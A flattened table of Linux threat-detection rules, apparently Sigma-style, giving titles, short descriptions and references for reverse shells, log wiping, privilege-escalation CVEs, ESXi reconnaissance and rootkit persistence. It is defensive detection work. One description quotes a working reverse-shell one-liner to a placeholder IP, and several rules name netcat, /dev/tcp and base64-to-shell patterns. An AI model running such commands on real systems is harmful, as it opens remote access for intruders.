Webshell Remote Command Execution |
Detects possible command execution by web application/web shell |
Personal Experience of the Author |
Equation Group Indicators |
Detects suspicious shell commands used in various Equation Group scripts and tools |
https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 |
Buffer Overflow Attempts |
Detects buffer overflow attempts in Unix system log files |
https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml |
Commands to Clear or Remove the Syslog - Builtin |
Detects specific commands commonly used to remove or empty the syslog |
https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 |
Remote File Copy |
Detects the use of tools that copy files from or to remote systems |
https://attack.mitre.org/techniques/T1105/ |
Code Injection by ld.so Preload |
Detects the ld.so preload persistence file. See `man ld.so` for more information. |
https://man7.org/linux/man-pages/man8/ld.so.8.html |
Nimbuspwn Exploitation |
Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) |
https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/, https://github.com/Immersive-Labs-Sec/nimbuspwn |
Potential Suspicious BPF Activity - Linux |
Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system. |
https://redcanary.com/blog/ebpf-malware/, https://man7.org/linux/man-pages/man7/bpf-helpers.7.html |
Shellshock Expression |
Detects shellshock expressions in log files |
https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf |
Privileged User Has Been Created |
Detects the addition of a new user to a privileged group such as "root" or "sudo" |
https://digital.nhs.uk/cyber-alerts/2018/cc-2825, https://linux.die.net/man/8/useradd, https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid |
Linux Command History Tampering |
Detects commands that try to clear or tamper with the Linux command history.
This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md, https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics, https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/ |
Suspicious Activity in Shell Commands |
Detects suspicious shell commands used in various exploit codes (see references) |
https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb, http://pastebin.com/FtygZ1cg, https://artkond.com/2017/03/23/pivoting-guide/ |
Suspicious Log Entries |
Detects suspicious log entries in Linux log files |
https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml |
Suspicious Reverse Shell Command Line |
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell |
https://alamot.github.io/reverse_shells/ |
Space After Filename |
Detects space after filename |
https://attack.mitre.org/techniques/T1064 |
Suspicious Use of /dev/tcp |
Detects suspicious command with /dev/tcp |
https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/, https://book.hacktricks.xyz/shells/shells/linux, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan |
JexBoss Command Sequence |
Detects suspicious command sequence that JexBoss |
https://www.us-cert.gov/ncas/analysis-reports/AR18-312A |
Symlink Etc Passwd |
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd |
https://www.qualys.com/2021/05/04/21nails/21nails.txt |
PwnKit Local Privilege Escalation |
Detects potential PwnKit exploitation CVE-2021-4034 in auth logs |
https://twitter.com/wdormann/status/1486161836961579020 |
Relevant ClamAV Message |
Detects relevant ClamAV messages |
https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml |
Modifying Crontab |
Detects suspicious modification of crontab file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md |
Guacamole Two Users Sharing Session Anomaly |
Detects suspicious session with two users present |
https://research.checkpoint.com/2020/apache-guacamole-rce/ |
SSHD Error Message CVE-2018-15473 |
Detects exploitation attempt using public exploit code for CVE-2018-15473 |
https://github.com/Rhynorater/CVE-2018-15473-Exploit |
Suspicious OpenSSH Daemon Error |
Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts |
https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c, https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml |
Sudo Privilege Escalation CVE-2019-14287 - Builtin |
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 |
https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546 |
Disabling Security Tools - Builtin |
Detects disabling security tools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md |
Persistence Via Sudoers Files |
Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh |
Suspicious Named Error |
Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts |
https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml |
Suspicious VSFTPD Error Messages |
Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts |
https://github.com/dagwieers/vsftpd/ |
Potentially Suspicious Shell Script Creation in Profile Folder |
Detects the creation of shell scripts under the "profile.d" path. |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Triple Cross eBPF Rootkit Default LockFile |
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 |
Persistence Via Cron Files |
Detects creation of cron file or files in Cron directories which could indicates potential persistence. |
https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml |
Linux Reverse Shell Indicator |
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') |
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md |
Wget Creating Files in Tmp Directory |
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Triple Cross eBPF Rootkit Default Persistence |
Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method |
https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh |
Linux Doas Conf File Creation |
Detects the creation of doas.conf file in linux host platform. |
https://research.splunk.com/endpoint/linux_doas_conf_file_creation/, https://www.makeuseof.com/how-to-install-and-use-doas/ |
Communication To Ngrok Tunneling Service - Linux |
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors |
https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent |
Communication To LocaltoNet Tunneling Service Initiated - Linux |
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
|
https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications |
Linux Crypto Mining Pool Connections |
Detects process connections to a Monero crypto mining pool |
https://www.poolwatch.io/coin/monero |
Potentially Suspicious Malware Callback Communication - Linux |
Detects programs that connect to known malware callback ports based on threat intelligence reports.
|
https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections, https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team, https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html, https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html, https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors |
Shell Invocation via Apt - Linux |
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/apt/, https://gtfobins.github.io/gtfobins/apt-get/ |
Scheduled Task/Job At |
Detects the use of at/atd which are utilities that are used to schedule tasks.
They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md |
Suspicious Invocation of Shell via AWK - Linux |
Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
|
https://gtfobins.github.io/gtfobins/awk/#shell, https://gtfobins.github.io/gtfobins/gawk/#shell, https://gtfobins.github.io/gtfobins/nawk/#shell, https://gtfobins.github.io/gtfobins/mawk/#shell |
Decode Base64 Encoded Text |
Detects usage of base64 utility to decode arbitrary base64-encoded text |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md |
Linux Base64 Encoded Pipe to Shell |
Detects suspicious process command line that uses base64 encoded input for execution with a shell |
https://github.com/arget13/DDexec, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
Bash Interactive Shell |
Detects execution of the bash shell with the interactive flag "-i". |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://linux.die.net/man/1/bash |
BPFtrace Unsafe Option Usage |
Detects the usage of the unsafe bpftrace option |
https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/ |
Enable BPF Kprobes Tracing |
Detects common command used to enable bpf kprobes tracing |
https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/, https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html |
Capabilities Discovery - Linux |
Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. |
https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes, https://github.com/carlospolop/PEASS-ng, https://github.com/diego-treitos/linux-smart-enumeration |
Capsh Shell Invocation - Linux |
Detects the use of the "capsh" utility to invoke a shell.
|
https://gtfobins.github.io/gtfobins/capsh/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Remove Immutable File Attribute |
Detects usage of the 'chattr' utility to remove immutable file attribute. |
https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Linux Base64 Encoded Shebang In CLI |
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded |
https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html, https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS |
Clipboard Collection with Xclip Tool |
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.
Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
|
https://www.packetlabs.net/posts/clipboard-data-security/ |
Clear Linux Logs |
Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md |
Cat Sudoers |
Detects the execution of a cat /etc/sudoers to list all users that have sudo rights |
https://github.com/sleventyeleven/linuxprivchecker/ |
Commands to Clear or Remove the Syslog |
Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md |
Crontab Enumeration |
Detects usage of crontab to list the tasks of the user |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Copy Passwd Or Shadow From TMP Path |
Detects when the file "passwd" or "shadow" is copied from tmp path |
https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Remove Scheduled Cron Task/Job |
Detects usage of the 'crontab' utility to remove the current crontab.
This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
|
https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Linux Crypto Mining Indicators |
Detects command line parameters or strings often used by crypto miners |
https://www.poolwatch.io/coin/monero |
Curl Usage on Linux |
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server |
https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Atlassian Confluence CVE-2022-26134 |
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 |
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ |
Apache Spark Shell Command Injection - ProcessCreation |
Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective |
https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files |
DD File Overwrite |
Detects potential overwriting and deletion of a file using DD. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd |
Potential Linux Process Code Injection Via DD Utility |
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. |
https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/, https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh |
Ufw Force Stop Using Ufw-Init |
Detects attempts to force stop the ufw using ufw-init |
https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Linux Doas Tool Execution |
Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. |
https://research.splunk.com/endpoint/linux_doas_tool_execution/, https://www.makeuseof.com/how-to-install-and-use-doas/ |
Shell Invocation via Env Command - Linux |
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
|
https://gtfobins.github.io/gtfobins/env/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
ESXi Network Configuration Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html |
ESXi Admin Permission Assigned To Account Via ESXCLI |
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. |
https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi Storage Information Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. |
https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html |
ESXi Syslog Configuration Change Via ESXCLI |
Detects changes to the ESXi syslog configuration via "esxcli" |
https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi System Information Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi Account Creation Via ESXCLI |
Detects user account creation on ESXi system via esxcli |
https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi VM List Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html |
ESXi VM Kill Via ESXCLI |
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html |
ESXi VSAN Information Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. |
https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html |
File and Directory Discovery - Linux |
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md |
File Deletion |
Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md |
Shell Execution via Find - Linux |
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
|
https://gtfobins.github.io/gtfobins/find/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Shell Execution via Flock - Linux |
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/flock/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Shell Execution GCC - Linux |
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/gcc/#shell, https://gtfobins.github.io/gtfobins/c89/#shell, https://gtfobins.github.io/gtfobins/c99/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Shell Execution via Git - Linux |
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/git/#shell |
OS Architecture Discovery Via Grep |
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
|
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Group Has Been Deleted Via Groupdel |
Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks |
https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/groupdel |
Install Root Certificate |
Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
Suspicious Package Installed - Linux |
Detects installation of suspicious packages using system installation utilities |
https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt |
Flush Iptables Ufw Chain |
Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic |
https://blogs.blackberry.com/, https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Local System Accounts Discovery - Linux |
Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md, https://my.f5.com/manage/s/article/K589, https://man.freebsd.org/cgi/man.cgi?pwd_mkdb |
Local Groups Discovery - Linux |
Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Potential GobRAT File Discovery Via Grep |
Detects the use of grep to discover specific files created by the GobRAT malware |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Named Pipe Created Via Mkfifo |
Detects the creation of a new named pipe using the "mkfifo" utility |
https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
Potentially Suspicious Named Pipe Created Via Mkfifo |
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location |
https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
Mount Execution With Hidepid Parameter |
Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system |
https://blogs.blackberry.com/, https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Potential Netcat Reverse Shell Execution |
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/, https://www.infosecademy.com/netcat-reverse-shells/, https://man7.org/linux/man-pages/man1/ncat.1.html |
Shell Execution via Nice - Linux |
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/nice/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Nohup Execution |
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments |
https://gtfobins.github.io/gtfobins/nohup/, https://en.wikipedia.org/wiki/Nohup, https://www.computerhope.com/unix/unohup.htm |
Suspicious Nohup Execution |
Detects execution of binaries located in potentially suspicious locations via "nohup" |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
OMIGOD SCX RunAsProvider ExecuteScript |
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059 |
OMIGOD SCX RunAsProvider ExecuteShellCommand |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059 |
Potential Perl Reverse Shell Execution |
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Potential PHP Reverse Shell |
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
|
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Pnscan Binary Data Transmission Activity |
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.
This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
|
https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence, https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf, https://regex101.com/r/RugQYK/1, https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content |
Connection Proxy |
Detects setting proxy configuration |
https://attack.mitre.org/techniques/T1090/ |
Python Spawning Pretty TTY Via PTY Module |
Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
|
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ |
Python Reverse Shell Execution Via PTY And Socket Modules |
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
|
https://www.revshells.com/ |
Inline Python Execution - Spawn Shell Via OS System Library |
Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
|
https://gtfobins.github.io/gtfobins/python/#shell |
Remote Access Tool - Team Viewer Session Started On Linux Host |
Detects the command line executed when TeamViewer starts a session started by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
|
Internal Research |
Linux Remote System Discovery |
Detects the enumeration of other remote systems. |
